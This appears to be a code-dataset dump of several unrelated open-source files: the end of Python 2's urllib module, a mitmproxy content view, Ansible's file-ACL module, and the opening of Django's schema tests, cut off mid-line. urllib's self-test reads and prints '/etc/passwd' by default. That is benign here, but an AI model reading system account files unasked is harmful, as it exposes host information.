'ProxyOverride')[0]) # ^^^^ Returned as Unicode but problems if not converted to ASCII except WindowsError: return 0 if not proxyEnable or not proxyOverride: return 0 # try to make a host list from name and IP address. rawHost, port = splitport(host) host = [rawHost] try: addr = socket.gethostbyname(rawHost) if addr != rawHost: host.append(addr) except socket.error: pass try: fqdn = socket.getfqdn(rawHost) if fqdn != rawHost: host.append(fqdn) except socket.error: pass # make a check value list from the registry entry: replace the # '<local>' string by the localhost entry and the corresponding # canonical entry. proxyOverride = proxyOverride.split(';') i = 0 while i < len(proxyOverride): if proxyOverride[i] == '<local>': proxyOverride[i:i+1] = ['localhost', '127.0.0.1', socket.gethostname(), socket.gethostbyname( socket.gethostname())] i += 1 # print proxyOverride # now check if we match one of the registry values. for test in proxyOverride: test = test.replace(".", r"\.") # mask dots test = test.replace("*", r".*") # change glob sequence test = test.replace("?", r".") # change glob char for val in host: # print "%s <--> %s" %( test, val ) if re.match(test, val, re.I): return 1 return 0 def proxy_bypass(host): """Return a dictionary of scheme -> proxy server URL mappings. Returns settings gathered from the environment, if specified, or the registry. """ if getproxies_environment(): return proxy_bypass_environment(host) else: return proxy_bypass_registry(host) else: # By default use environment variables getproxies = getproxies_environment proxy_bypass = proxy_bypass_environment # Test and time quote() and unquote() def test1(): s = '' for i in range(256): s = s + chr(i) s = s*4 t0 = time.time() qs = quote(s) uqs = unquote(qs) t1 = time.time() if uqs != s: print 'Wrong!' print repr(s) print repr(qs) print repr(uqs) print round(t1 - t0, 3), 'sec' def reporthook(blocknum, blocksize, totalsize): # Report during remote transfers print "Block number: %d, Block size: %d, Total size: %d" % ( blocknum, blocksize, totalsize) # Test program def test(args=[]): if not args: args = [ '/etc/passwd', 'file:/etc/passwd', 'file://localhost/etc/passwd', 'ftp://ftp.gnu.org/pub/README', 'http://www.python.org/index.html', ] if hasattr(URLopener, "open_https"): args.append('https://synergy.as.cmu.edu/~geek/') try: for url in args: print '-'*10, url, '-'*10 fn, h = urlretrieve(url, None, reporthook) print fn if h: print '======' for k in h.keys(): print k + ':', h[k] print '======' fp = open(fn, 'rb') data = fp.read() del fp if '\r' in data: table = string.maketrans("", "") data = data.translate(table, "\r") print data fn, h = None, None print '-'*40 finally: urlcleanup() def main(): import getopt, sys try: opts, args = getopt.getopt(sys.argv[1:], "th") except getopt.error, msg: print msg print "Use -h for help" return t = 0 for o, a in opts: if o == '-t': t = t + 1 if o == '-h': print "Usage: python urllib.py [-t] [url ...]" print "-t runs self-test;", print "otherwise, contents of urls are printed" return if t: if t > 1: test1() test(args) else: if not args: print "Use -h for help" for url in args: print urlopen(url).read(), # Run test program when run as a script if __name__ == '__main__': main()
apache-2.0
mhils/mitmproxy
mitmproxy/contentviews/auto.py
1
1091
from mitmproxy import contentviews from mitmproxy.net import http from mitmproxy.utils import strutils from . import base class ViewAuto(base.View): name = "Auto" def __call__(self, data, **metadata): headers = metadata.get("headers", {}) ctype = headers.get("content-type") if data and ctype: ct = http.parse_content_type(ctype) if ctype else None ct = "{}/{}".format(ct[0], ct[1]) if ct in contentviews.content_types_map: return contentviews.content_types_map[ct][0](data, **metadata) elif strutils.is_xml(data): return contentviews.get("XML/HTML")(data, **metadata) elif ct.startswith("image/"): return contentviews.get("Image")(data, **metadata) if metadata.get("query"): return contentviews.get("Query")(data, **metadata) if data and strutils.is_mostly_bin(data): return contentviews.get("Hex")(data) if not data: return "No content", [] return contentviews.get("Raw")(data)
mit
supertom/ansible-modules-core
files/acl.py
17
11212
#!/usr/bin/python # -*- coding: utf-8 -*- # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. DOCUMENTATION = ''' --- module: acl version_added: "1.4" short_description: Sets and retrieves file ACL information. description: - Sets and retrieves file ACL information. options: name: required: true default: null description: - The full path of the file or object. aliases: ['path'] state: required: false default: query choices: [ 'query', 'present', 'absent' ] description: - defines whether the ACL should be present or not. The C(query) state gets the current acl without changing it, for use in 'register' operations. follow: required: false default: yes choices: [ 'yes', 'no' ] description: - whether to follow symlinks on the path if a symlink is encountered. default: version_added: "1.5" required: false default: no choices: [ 'yes', 'no' ] description: - if the target is a directory, setting this to yes will make it the default acl for entities created inside the directory. It causes an error if name is a file. entity: version_added: "1.5" required: false description: - actual user or group that the ACL applies to when matching entity types user or group are selected. etype: version_added: "1.5" required: false default: null choices: [ 'user', 'group', 'mask', 'other' ] description: - the entity type of the ACL to apply, see setfacl documentation for more info. permissions: version_added: "1.5" required: false default: null description: - Permissions to apply/remove can be any combination of r, w and x (read, write and execute respectively) entry: required: false default: null description: - DEPRECATED. The acl to set or remove. This must always be quoted in the form of '<etype>:<qualifier>:<perms>'. The qualifier may be empty for some types, but the type and perms are always requried. '-' can be used as placeholder when you do not care about permissions. This is now superseded by entity, type and permissions fields. recursive: version_added: "2.0" required: false default: no choices: [ 'yes', 'no' ] description: - Recursively sets the specified ACL (added in Ansible 2.0). Incompatible with C(state=query). author: - "Brian Coca (@bcoca)" - "Jérémie Astori (@astorije)" notes: - The "acl" module requires that acls are enabled on the target filesystem and that the setfacl and getfacl binaries are installed. - As of Ansible 2.0, this module only supports Linux distributions. ''' EXAMPLES = ''' # Grant user Joe read access to a file - acl: name=/etc/foo.conf entity=joe etype=user permissions="r" state=present # Removes the acl for Joe on a specific file - acl: name=/etc/foo.conf entity=joe etype=user state=absent # Sets default acl for joe on foo.d - acl: name=/etc/foo.d entity=joe etype=user permissions=rw default=yes state=present # Same as previous but using entry shorthand - acl: name=/etc/foo.d entry="default:user:joe:rw-" state=present # Obtain the acl for a specific file - acl: name=/etc/foo.conf register: acl_info ''' RETURN = ''' acl: description: Current acl on provided path (after changes, if any) returned: success type: list sample: [ "user::rwx", "group::rwx", "other::rwx" ] ''' def split_entry(entry): ''' splits entry and ensures normalized return''' a = entry.split(':') d = None if entry.lower().startswith("d"): d = True a.pop(0) if len(a) == 2: a.append(None) t, e, p = a t = t.lower() if t.startswith("u"): t = "user" elif t.startswith("g"): t = "group" elif t.startswith("m"): t = "mask" elif t.startswith("o"): t = "other" else: t = None return [d, t, e, p] def build_entry(etype, entity, permissions=None, use_nfsv4_acls=False): '''Builds and returns an entry string. Does not include the permissions bit if they are not provided.''' if use_nfsv4_acls: return ':'.join([etype, entity, permissions, 'allow']) if permissions: return etype + ':' + entity + ':' + permissions else: return etype + ':' + entity def build_command(module, mode, path, follow, default, recursive, entry=''): '''Builds and returns a getfacl/setfacl command.''' if mode == 'set': cmd = [module.get_bin_path('setfacl', True)] cmd.append('-m "%s"' % entry) elif mode == 'rm': cmd = [module.get_bin_path('setfacl', True)] cmd.append('-x "%s"' % entry) else: # mode == 'get' cmd = [module.get_bin_path('getfacl', True)] # prevents absolute path warnings and removes headers if get_platform().lower() == 'linux': cmd.append('--omit-header') cmd.append('--absolute-names') if recursive: cmd.append('--recursive') if not follow: if get_platform().lower() == 'linux': cmd.append('--physical') elif get_platform().lower() == 'freebsd': cmd.append('-h') if default: if(mode == 'rm'): cmd.insert(1, '-k') else: # mode == 'set' or mode == 'get' cmd.insert(1, '-d') cmd.append(path) return cmd def acl_changed(module, cmd): '''Returns true if the provided command affects the existing ACLs, false otherwise.''' # FreeBSD do not have a --test flag, so by default, it is safer to always say "true" if get_platform().lower() == 'freebsd': return True cmd = cmd[:] # lists are mutables so cmd would be overriden without this cmd.insert(1, '--test') lines = run_acl(module, cmd) for line in lines: if not line.endswith('*,*'): return True return False def run_acl(module, cmd, check_rc=True): try: (rc, out, err) = module.run_command(' '.join(cmd), check_rc=check_rc) except Exception: e = get_exception() module.fail_json(msg=e.strerror) lines = [] for l in out.splitlines(): if not l.startswith('#'): lines.append(l.strip()) if lines and not lines[-1].split(): # trim last line only when it is empty return lines[:-1] else: return lines def main(): module = AnsibleModule( argument_spec=dict( name=dict(required=True, aliases=['path'], type='path'), entry=dict(required=False, type='str'), entity=dict(required=False, type='str', default=''), etype=dict( required=False, choices=['other', 'user', 'group', 'mask'], type='str' ), permissions=dict(required=False, type='str'), state=dict( required=False, default='query', choices=['query', 'present', 'absent'], type='str' ), follow=dict(required=False, type='bool', default=True), default=dict(required=False, type='bool', default=False), recursive=dict(required=False, type='bool', default=False), use_nfsv4_acls=dict(required=False, type='bool', default=False) ), supports_check_mode=True, ) if get_platform().lower() not in ['linux', 'freebsd']: module.fail_json(msg="The acl module is not available on this system.") path = module.params.get('name') entry = module.params.get('entry') entity = module.params.get('entity') etype = module.params.get('etype') permissions = module.params.get('permissions') state = module.params.get('state') follow = module.params.get('follow') default = module.params.get('default') recursive = module.params.get('recursive') use_nfsv4_acls = module.params.get('use_nfsv4_acls') if not os.path.exists(path): module.fail_json(msg="Path not found or not accessible.") if state == 'query' and recursive: module.fail_json(msg="'recursive' MUST NOT be set when 'state=query'.") if not entry: if state == 'absent' and permissions: module.fail_json(msg="'permissions' MUST NOT be set when 'state=absent'.") if state == 'absent' and not entity: module.fail_json(msg="'entity' MUST be set when 'state=absent'.") if state in ['present', 'absent'] and not etype: module.fail_json(msg="'etype' MUST be set when 'state=%s'." % state) if entry: if etype or entity or permissions: module.fail_json(msg="'entry' MUST NOT be set when 'entity', 'etype' or 'permissions' are set.") if state == 'present' and not entry.count(":") in [2, 3]: module.fail_json(msg="'entry' MUST have 3 or 4 sections divided by ':' when 'state=present'.") if state == 'absent' and not entry.count(":") in [1, 2]: module.fail_json(msg="'entry' MUST have 2 or 3 sections divided by ':' when 'state=absent'.") if state == 'query': module.fail_json(msg="'entry' MUST NOT be set when 'state=query'.") default_flag, etype, entity, permissions = split_entry(entry) if default_flag != None: default = default_flag if get_platform().lower() == 'freebsd': if recursive: module.fail_json(msg="recursive is not supported on that platform.") changed = False msg = "" if state == 'present': entry = build_entry(etype, entity, permissions, use_nfsv4_acls) command = build_command( module, 'set', path, follow, default, recursive, entry ) changed = acl_changed(module, command) if changed and not module.check_mode: run_acl(module, command) msg = "%s is present" % entry elif state == 'absent': entry = build_entry(etype, entity, use_nfsv4_acls) command = build_command( module, 'rm', path, follow, default, recursive, entry ) changed = acl_changed(module, command) if changed and not module.check_mode: run_acl(module, command, False) msg = "%s is absent" % entry elif state == 'query': msg = "current acl" acl = run_acl( module, build_command(module, 'get', path, follow, default, recursive) ) module.exit_json(changed=changed, msg=msg, acl=acl) # import module snippets from ansible.module_utils.basic import * main()
gpl-3.0
ryangallen/django
tests/schema/tests.py
83
71412
import datetime import itertools import unittest from copy import copy from django.db import ( DatabaseError, IntegrityError, OperationalError, connection, ) from django.db.models import Model from django.db.models.deletion import CASCADE from django.db.models.fields import ( AutoField, BigIntegerField, BinaryField, BooleanField, CharField, DateField, DateTimeField, IntegerField, PositiveIntegerField, SlugField, TextField, TimeField, ) from django.db.models.fields.related import ( ForeignKey, ForeignObject, ManyToManyField, OneToOneField, ) from django.db.transaction import atomic from django.test import ( TransactionTestCase, skipIfDBFeature, skipUnlessDBFeature, ) from .fields import ( CustomManyToManyField, InheritedManyToManyField, MediumBlobField, ) from .models import ( Author, AuthorWithDefaultHeight, AuthorWithEvenLongerName, Book, BookForeignObj, BookWeak, BookWithLongName, BookWithO2O, BookWithoutAuthor, BookWithSlug, IntegerPK, Note, NoteRename, Tag, TagIndexed, TagM2MTest, TagUniqueRename, Thing, UniqueTest, new_apps, ) class SchemaTests(TransactionTestCase): """ Tests that the schema-alteration code works correctly. Be aware that these tests are more liable than most to false results, as sometimes the code to check if a test has worked is almost as complex as the code it is testing. """ available_apps = [] models = [ Author, AuthorWithDefaultHeight, AuthorWithEvenLongerName, Book, BookWeak, BookWithLongName, BookWithO2O, BookWithSlug, IntegerPK, Note, Tag, TagIndexed, TagM2MTest, TagUniqueRename, Thing, UniqueTest, ] # Utility functions def setUp(self): # local_models should contain test dependent model classes that will be # automatically removed from the app cache on test tear down. self.local_models = [] def tearDown(self): # Delete any tables made for our models self.delete_tables() new_apps.clear_cache() for model in new_apps.get_models(): model._meta._expire_cache() if 'schema' in new_apps.all_models: for model in self.local_models: del new_apps.all_models['schema'][model._meta.model_name] def delete_tables(self): "Deletes all model tables for our models for a clean test environment" converter = connection.introspection.table_name_converter with connection.cursor() as cursor: connection.disable_constraint_checking() table_names = connection.introspection.table_names(cursor) for model in itertools.chain(SchemaTests.models, self.local_models): # Remove any M2M tables first for field in model._meta.local_many_to_many: with atomic(): tbl = converter(field.remote_field.through._meta.db_table) if tbl in table_names: cursor.execute(connection.schema_editor().sql_delete_table % { "table": connection.ops.quote_name(tbl), }) table_names.remove(tbl) # Then remove the main tables with atomic(): tbl = converter(model._meta.db_table) if tbl in table_names: cursor.execute(connection.schema_editor().sql_delete_table % { "table": connection.ops.quote_name(tbl), }) table_names.remove(tbl) connection.enable_constraint_checking() def column_classes(self, model): with connection.cursor() as cursor: columns = { d[0]: (connection.introspection.get_field_type(d[1], d), d) for d in connection.introspection.get_table_description( cursor, model._meta.db_table, ) } # SQLite has a different format for field_type for name, (type, desc) in columns.items(): if isinstance(type, tuple): columns[name] = (type[0], desc) # SQLite also doesn't error properly if not columns: raise DatabaseError("Table does not exist (empty pragma)") return columns def get_indexes(self, table): """ Get the indexes on the table using a new cursor. """ with connection.cursor() as cursor: return connection.introspection.get_indexes(cursor, table) def get_constraints(self, table): """ Get the constraints on a table using a new cursor. """ with connection.cursor() as cursor: return connection.introspection.get_constraints(cursor, table) # Tests def test_creation_deletion(self): """ Tries creating a model's table, and then deleting it. """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) # Check that it's there list(Author.objects.all()) # Clean up that table with connection.schema_editor() as editor: editor.delete_model(Author) # Check that it's gone self.assertRaises( DatabaseError, lambda: list(Author.objects.all()), ) @skipUnlessDBFeature('supports_foreign_keys') def test_fk(self): "Tests that creating tables out of FK order, then repointing, works" # Create the table with connection.schema_editor() as editor: editor.create_model(Book) editor.create_model(Author) editor.create_model(Tag) # Check that initial tables are there list(Author.objects.all()) list(Book.objects.all()) # Make sure the FK constraint is present with self.assertRaises(IntegrityError): Book.objects.create( author_id=1, title="Much Ado About Foreign Keys", pub_date=datetime.datetime.now(), ) # Repoint the FK constraint old_field = Book._meta.get_field("author") new_field = ForeignKey(Tag, CASCADE) new_field.set_attributes_from_name("author") with connection.schema_editor() as editor: editor.alter_field(Book, old_field, new_field, strict=True) # Make sure the new FK constraint is present constraints = self.get_constraints(Book._meta.db_table) for name, details in constraints.items(): if details['columns'] == ["author_id"] and details['foreign_key']: self.assertEqual(details['foreign_key'], ('schema_tag', 'id')) break else: self.fail("No FK constraint for author_id found") @skipUnlessDBFeature('supports_foreign_keys') def test_fk_db_constraint(self): "Tests that the db_constraint parameter is respected" # Create the table with connection.schema_editor() as editor: editor.create_model(Tag) editor.create_model(Author) editor.create_model(BookWeak) # Check that initial tables are there list(Author.objects.all()) list(Tag.objects.all()) list(BookWeak.objects.all()) # Check that BookWeak doesn't have an FK constraint constraints = self.get_constraints(BookWeak._meta.db_table) for name, details in constraints.items(): if details['columns'] == ["author_id"] and details['foreign_key']: self.fail("FK constraint for author_id found") # Make a db_constraint=False FK new_field = ForeignKey(Tag, CASCADE, db_constraint=False) new_field.set_attributes_from_name("tag") with connection.schema_editor() as editor: editor.add_field(Author, new_field) # Make sure no FK constraint is present constraints = self.get_constraints(Author._meta.db_table) for name, details in constraints.items(): if details['columns'] == ["tag_id"] and details['foreign_key']: self.fail("FK constraint for tag_id found") # Alter to one with a constraint new_field2 = ForeignKey(Tag, CASCADE) new_field2.set_attributes_from_name("tag") with connection.schema_editor() as editor: editor.alter_field(Author, new_field, new_field2, strict=True) # Make sure the new FK constraint is present constraints = self.get_constraints(Author._meta.db_table) for name, details in constraints.items(): if details['columns'] == ["tag_id"] and details['foreign_key']: self.assertEqual(details['foreign_key'], ('schema_tag', 'id')) break else: self.fail("No FK constraint for tag_id found") # Alter to one without a constraint again new_field2 = ForeignKey(Tag, CASCADE) new_field2.set_attributes_from_name("tag") with connection.schema_editor() as editor: editor.alter_field(Author, new_field2, new_field, strict=True) # Make sure no FK constraint is present constraints = self.get_constraints(Author._meta.db_table) for name, details in constraints.items(): if details['columns'] == ["tag_id"] and details['foreign_key']: self.fail("FK constraint for tag_id found") def _test_m2m_db_constraint(self, M2MFieldClass): class LocalAuthorWithM2M(Model): name = CharField(max_length=255) class Meta: app_label = 'schema' apps = new_apps self.local_models = [LocalAuthorWithM2M] # Create the table with connection.schema_editor() as editor: editor.create_model(Tag) editor.create_model(LocalAuthorWithM2M) # Check that initial tables are there list(LocalAuthorWithM2M.objects.all()) list(Tag.objects.all()) # Make a db_constraint=False FK new_field = M2MFieldClass(Tag, related_name="authors", db_constraint=False) new_field.contribute_to_class(LocalAuthorWithM2M, "tags") # Add the field with connection.schema_editor() as editor: editor.add_field(LocalAuthorWithM2M, new_field) # Make sure no FK constraint is present constraints = self.get_constraints(new_field.remote_field.through._meta.db_table) for name, details in constraints.items(): if details['columns'] == ["tag_id"] and details['foreign_key']: self.fail("FK constraint for tag_id found") @skipUnlessDBFeature('supports_foreign_keys') def test_m2m_db_constraint(self): self._test_m2m_db_constraint(ManyToManyField) @skipUnlessDBFeature('supports_foreign_keys') def test_m2m_db_constraint_custom(self): self._test_m2m_db_constraint(CustomManyToManyField) @skipUnlessDBFeature('supports_foreign_keys') def test_m2m_db_constraint_inherited(self): self._test_m2m_db_constraint(InheritedManyToManyField) def test_add_field(self): """ Tests adding fields to models """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) # Ensure there's no age field columns = self.column_classes(Author) self.assertNotIn("age", columns) # Add the new field new_field = IntegerField(null=True) new_field.set_attributes_from_name("age") with connection.schema_editor() as editor: editor.add_field(Author, new_field) # Ensure the field is right afterwards columns = self.column_classes(Author) self.assertEqual(columns['age'][0], "IntegerField") self.assertEqual(columns['age'][1][6], True) def test_add_field_temp_default(self): """ Tests adding fields to models with a temporary default """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) # Ensure there's no age field columns = self.column_classes(Author) self.assertNotIn("age", columns) # Add some rows of data Author.objects.create(name="Andrew", height=30) Author.objects.create(name="Andrea") # Add a not-null field new_field = CharField(max_length=30, default="Godwin") new_field.set_attributes_from_name("surname") with connection.schema_editor() as editor: editor.add_field(Author, new_field) # Ensure the field is right afterwards columns = self.column_classes(Author) self.assertEqual(columns['surname'][0], "CharField") self.assertEqual(columns['surname'][1][6], connection.features.interprets_empty_strings_as_nulls) def test_add_field_temp_default_boolean(self): """ Tests adding fields to models with a temporary default where the default is False. (#21783) """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) # Ensure there's no age field columns = self.column_classes(Author) self.assertNotIn("age", columns) # Add some rows of data Author.objects.create(name="Andrew", height=30) Author.objects.create(name="Andrea") # Add a not-null field new_field = BooleanField(default=False) new_field.set_attributes_from_name("awesome") with connection.schema_editor() as editor: editor.add_field(Author, new_field) # Ensure the field is right afterwards columns = self.column_classes(Author) # BooleanField are stored as TINYINT(1) on MySQL. field_type = columns['awesome'][0] self.assertEqual(field_type, connection.features.introspected_boolean_field_type(new_field, created_separately=True)) def test_add_field_default_transform(self): """ Tests adding fields to models with a default that is not directly valid in the database (#22581) """ class TestTransformField(IntegerField): # Weird field that saves the count of items in its value def get_default(self): return self.default def get_prep_value(self, value): if value is None: return 0 return len(value) # Create the table with connection.schema_editor() as editor: editor.create_model(Author) # Add some rows of data Author.objects.create(name="Andrew", height=30) Author.objects.create(name="Andrea") # Add the field with a default it needs to cast (to string in this case) new_field = TestTransformField(default={1: 2}) new_field.set_attributes_from_name("thing") with connection.schema_editor() as editor: editor.add_field(Author, new_field) # Ensure the field is there columns = self.column_classes(Author) field_type, field_info = columns['thing'] self.assertEqual(field_type, 'IntegerField') # Make sure the values were transformed correctly self.assertEqual(Author.objects.extra(where=["thing = 1"]).count(), 2) def test_add_field_binary(self): """ Tests binary fields get a sane default (#22851) """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) # Add the new field new_field = BinaryField(blank=True) new_field.set_attributes_from_name("bits") with connection.schema_editor() as editor: editor.add_field(Author, new_field) # Ensure the field is right afterwards columns = self.column_classes(Author) # MySQL annoyingly uses the same backend, so it'll come back as one of # these two types. self.assertIn(columns['bits'][0], ("BinaryField", "TextField")) @unittest.skipUnless(connection.vendor == 'mysql', "MySQL specific") def test_add_binaryfield_mediumblob(self): """ Test adding a custom-sized binary field on MySQL (#24846). """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) # Add the new field with default new_field = MediumBlobField(blank=True, default=b'123') new_field.set_attributes_from_name('bits') with connection.schema_editor() as editor: editor.add_field(Author, new_field) columns = self.column_classes(Author) # Introspection treats BLOBs as TextFields self.assertEqual(columns['bits'][0], "TextField") def test_alter(self): """ Tests simple altering of fields """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) # Ensure the field is right to begin with columns = self.column_classes(Author) self.assertEqual(columns['name'][0], "CharField") self.assertEqual(bool(columns['name'][1][6]), bool(connection.features.interprets_empty_strings_as_nulls)) # Alter the name field to a TextField old_field = Author._meta.get_field("name") new_field = TextField(null=True) new_field.set_attributes_from_name("name") with connection.schema_editor() as editor: editor.alter_field(Author, old_field, new_field, strict=True) # Ensure the field is right afterwards columns = self.column_classes(Author) self.assertEqual(columns['name'][0], "TextField") self.assertEqual(columns['name'][1][6], True) # Change nullability again new_field2 = TextField(null=False) new_field2.set_attributes_from_name("name") with connection.schema_editor() as editor: editor.alter_field(Author, new_field, new_field2, strict=True) # Ensure the field is right afterwards columns = self.column_classes(Author) self.assertEqual(columns['name'][0], "TextField") self.assertEqual(bool(columns['name'][1][6]), bool(connection.features.interprets_empty_strings_as_nulls)) def test_alter_text_field(self): # Regression for "BLOB/TEXT column 'info' can't have a default value") # on MySQL. # Create the table with connection.schema_editor() as editor: editor.create_model(Note) old_field = Note._meta.get_field("info") new_field = TextField(blank=True) new_field.set_attributes_from_name("info") with connection.schema_editor() as editor: editor.alter_field(Note, old_field, new_field, strict=True) def test_alter_text_field_to_date_field(self): """ #25002 - Test conversion of text field to date field. """ with connection.schema_editor() as editor: editor.create_model(Note) Note.objects.create(info='1988-05-05') old_field = Note._meta.get_field('info') new_field = DateField(blank=True) new_field.set_attributes_from_name('info') with connection.schema_editor() as editor: editor.alter_field(Note, old_field, new_field, strict=True) # Make sure the field isn't nullable columns = self.column_classes(Note) self.assertFalse(columns['info'][1][6]) def test_alter_text_field_to_datetime_field(self): """ #25002 - Test conversion of text field to datetime field. """ with connection.schema_editor() as editor: editor.create_model(Note) Note.objects.create(info='1988-05-05 3:16:17.4567') old_field = Note._meta.get_field('info') new_field = DateTimeField(blank=True) new_field.set_attributes_from_name('info') with connection.schema_editor() as editor: editor.alter_field(Note, old_field, new_field, strict=True) # Make sure the field isn't nullable columns = self.column_classes(Note) self.assertFalse(columns['info'][1][6]) def test_alter_text_field_to_time_field(self): """ #25002 - Test conversion of text field to time field. """ with connection.schema_editor() as editor: editor.create_model(Note) Note.objects.create(info='3:16:17.4567') old_field = Note._meta.get_field('info') new_field = TimeField(blank=True) new_field.set_attributes_from_name('info') with connection.schema_editor() as editor: editor.alter_field(Note, old_field, new_field, strict=True) # Make sure the field isn't nullable columns = self.column_classes(Note) self.assertFalse(columns['info'][1][6]) @skipIfDBFeature('interprets_empty_strings_as_nulls') def test_alter_textual_field_keep_null_status(self): """ Changing a field type shouldn't affect the not null status. """ with connection.schema_editor() as editor: editor.create_model(Note) with self.assertRaises(IntegrityError): Note.objects.create(info=None) old_field = Note._meta.get_field("info") new_field = CharField(max_length=50) new_field.set_attributes_from_name("info") with connection.schema_editor() as editor: editor.alter_field(Note, old_field, new_field, strict=True) with self.assertRaises(IntegrityError): Note.objects.create(info=None) def test_alter_numeric_field_keep_null_status(self): """ Changing a field type shouldn't affect the not null status. """ with connection.schema_editor() as editor: editor.create_model(UniqueTest) with self.assertRaises(IntegrityError): UniqueTest.objects.create(year=None, slug='aaa') old_field = UniqueTest._meta.get_field("year") new_field = BigIntegerField() new_field.set_attributes_from_name("year") with connection.schema_editor() as editor: editor.alter_field(UniqueTest, old_field, new_field, strict=True) with self.assertRaises(IntegrityError): UniqueTest.objects.create(year=None, slug='bbb') def test_alter_null_to_not_null(self): """ #23609 - Tests handling of default values when altering from NULL to NOT NULL. """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) # Ensure the field is right to begin with columns = self.column_classes(Author) self.assertTrue(columns['height'][1][6]) # Create some test data Author.objects.create(name='Not null author', height=12) Author.objects.create(name='Null author') # Verify null value self.assertEqual(Author.objects.get(name='Not null author').height, 12) self.assertIsNone(Author.objects.get(name='Null author').height) # Alter the height field to NOT NULL with default old_field = Author._meta.get_field("height") new_field = PositiveIntegerField(default=42) new_field.set_attributes_from_name("height") with connection.schema_editor() as editor: editor.alter_field(Author, old_field, new_field) # Ensure the field is right afterwards columns = self.column_classes(Author) self.assertFalse(columns['height'][1][6]) # Verify default value self.assertEqual(Author.objects.get(name='Not null author').height, 12) self.assertEqual(Author.objects.get(name='Null author').height, 42) def test_alter_charfield_to_null(self): """ #24307 - Should skip an alter statement on databases with interprets_empty_strings_as_null when changing a CharField to null. """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) # Change the CharField to null old_field = Author._meta.get_field('name') new_field = copy(old_field) new_field.null = True with connection.schema_editor() as editor: editor.alter_field(Author, old_field, new_field) def test_alter_textfield_to_null(self): """ #24307 - Should skip an alter statement on databases with interprets_empty_strings_as_null when changing a TextField to null. """ # Create the table with connection.schema_editor() as editor: editor.create_model(Note) # Change the TextField to null old_field = Note._meta.get_field('info') new_field = copy(old_field) new_field.null = True with connection.schema_editor() as editor: editor.alter_field(Note, old_field, new_field) @skipUnlessDBFeature('supports_combined_alters') def test_alter_null_to_not_null_keeping_default(self): """ #23738 - Can change a nullable field with default to non-nullable with the same default. """ # Create the table with connection.schema_editor() as editor: editor.create_model(AuthorWithDefaultHeight) # Ensure the field is right to begin with columns = self.column_classes(AuthorWithDefaultHeight) self.assertTrue(columns['height'][1][6]) # Alter the height field to NOT NULL keeping the previous default old_field = AuthorWithDefaultHeight._meta.get_field("height") new_field = PositiveIntegerField(default=42) new_field.set_attributes_from_name("height") with connection.schema_editor() as editor: editor.alter_field(AuthorWithDefaultHeight, old_field, new_field) # Ensure the field is right afterwards columns = self.column_classes(AuthorWithDefaultHeight) self.assertFalse(columns['height'][1][6]) @skipUnlessDBFeature('supports_foreign_keys') def test_alter_fk(self): """ Tests altering of FKs """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) editor.create_model(Book) # Ensure the field is right to begin with columns = self.column_classes(Book) self.assertEqual(columns['author_id'][0], "IntegerField") # Make sure the FK constraint is present constraints = self.get_constraints(Book._meta.db_table) for name, details in constraints.items(): if details['columns'] == ["author_id"] and details['foreign_key']: self.assertEqual(details['foreign_key'], ('schema_author', 'id')) break else: self.fail("No FK constraint for author_id found") # Alter the FK old_field = Book._meta.get_field("author") new_field = ForeignKey(Author, CASCADE, editable=False) new_field.set_attributes_from_name("author") with connection.schema_editor() as editor: editor.alter_field(Book, old_field, new_field, strict=True) # Ensure the field is right afterwards columns = self.column_classes(Book) self.assertEqual(columns['author_id'][0], "IntegerField") # Make sure the FK constraint is present constraints = self.get_constraints(Book._meta.db_table) for name, details in constraints.items(): if details['columns'] == ["author_id"] and details['foreign_key']: self.assertEqual(details['foreign_key'], ('schema_author', 'id')) break else: self.fail("No FK constraint for author_id found") @skipUnlessDBFeature('supports_foreign_keys') def test_alter_to_fk(self): """ #24447 - Tests adding a FK constraint for an existing column """ class LocalBook(Model): author = IntegerField() title = CharField(max_length=100, db_index=True) pub_date = DateTimeField() class Meta: app_label = 'schema' apps = new_apps self.local_models = [LocalBook] # Create the tables with connection.schema_editor() as editor: editor.create_model(Author) editor.create_model(LocalBook) # Ensure no FK constraint exists constraints = self.get_constraints(LocalBook._meta.db_table) for name, details in constraints.items(): if details['foreign_key']: self.fail('Found an unexpected FK constraint to %s' % details['columns']) old_field = LocalBook._meta.get_field("author") new_field = ForeignKey(Author, CASCADE) new_field.set_attributes_from_name("author") with connection.schema_editor() as editor: editor.alter_field(LocalBook, old_field, new_field, strict=True) constraints = self.get_constraints(LocalBook._meta.db_table) # Ensure FK constraint exists for name, details in constraints.items(): if details['foreign_key'] and details['columns'] == ["author_id"]: self.assertEqual(details['foreign_key'], ('schema_author', 'id')) break else: self.fail("No FK constraint for author_id found") @skipUnlessDBFeature('supports_foreign_keys') def test_alter_o2o_to_fk(self): """ #24163 - Tests altering of OneToOneField to ForeignKey """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) editor.create_model(BookWithO2O) # Ensure the field is right to begin with columns = self.column_classes(BookWithO2O) self.assertEqual(columns['author_id'][0], "IntegerField") # Ensure the field is unique author = Author.objects.create(name="Joe") BookWithO2O.objects.create(author=author, title="Django 1", pub_date=datetime.datetime.now()) with self.assertRaises(IntegrityError): BookWithO2O.objects.create(author=author, title="Django 2", pub_date=datetime.datetime.now()) BookWithO2O.objects.all().delete() # Make sure the FK constraint is present constraints = self.get_constraints(BookWithO2O._meta.db_table) author_is_fk = False for name, details in constraints.items(): if details['columns'] == ['author_id']: if details['foreign_key'] and details['foreign_key'] == ('schema_author', 'id'): author_is_fk = True self.assertTrue(author_is_fk, "No FK constraint for author_id found") # Alter the OneToOneField to ForeignKey old_field = BookWithO2O._meta.get_field("author") new_field = ForeignKey(Author, CASCADE) new_field.set_attributes_from_name("author") with 